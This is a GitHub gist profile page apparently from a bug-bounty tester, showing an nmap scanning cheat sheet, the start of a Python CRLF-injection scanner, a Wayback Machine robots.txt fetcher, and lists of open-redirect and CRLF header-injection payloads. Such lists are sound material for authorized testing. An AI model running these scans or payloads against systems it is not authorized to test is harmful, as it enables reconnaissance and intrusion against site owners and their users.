Skip to content

Instantly share code, notes, and snippets.

View xsxsd's full-sized avatar

xs xsa xsxsd

View GitHub Profile
COMMAND DESCRIPTION
nmap -sP 10.0.0.0/24
Ping scans the network, listing machines that respond to ping.
nmap -p 1-65535 -sV -sS -T4 target
Full TCP port scan using with service version detection - usually my first scan, I find T4 more accurate than T5 and still "pretty quick".
nmap -v -sS -A -T4 target
Prints verbose output, runs stealth syn scan, T4 timing, OS and version detection + traceroute and scripts against target services.
nmap -v -sS -A -T5 target
Prints verbose output, runs stealth syn scan, T5 timing, OS and version detection + traceroute and scripts against target services.
nmap -v -sV -O -sS -T5 target
@xsxsd
xsxsd / Crlf .py
Created August 15, 2017 13:30
Crlf tester
#!/usr/bin/python
'''
# Command line tool for scanning urls for CRLF injection.
'''
import sys, getopt
import requests
import eventlet
from termcolor import colored
@xsxsd
xsxsd / Open-Redirect-payloads.txt
Created August 15, 2017 11:59
Open-Redirect-payloads.txt
//google.com/%2f..
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
@xsxsd
xsxsd / waybackrobots.py
Created August 15, 2017 11:57
waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@xsxsd
xsxsd / Crlf paylods .txt
Created August 15, 2017 11:56
Crlf paylods
%0AHeader-Test:BLATRUC
%0A%20Header-Test:BLATRUC
%20%0AHeader-Test:BLATRUC
%23%OAHeader-Test:BLATRUC
%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
%3F%0AHeader-Test:BLATRUC
crlf%0AHeader-Test:BLATRUC
crlf%0A%20Header-Test:BLATRUC
crlf%20%0AHeader-Test:BLATRUC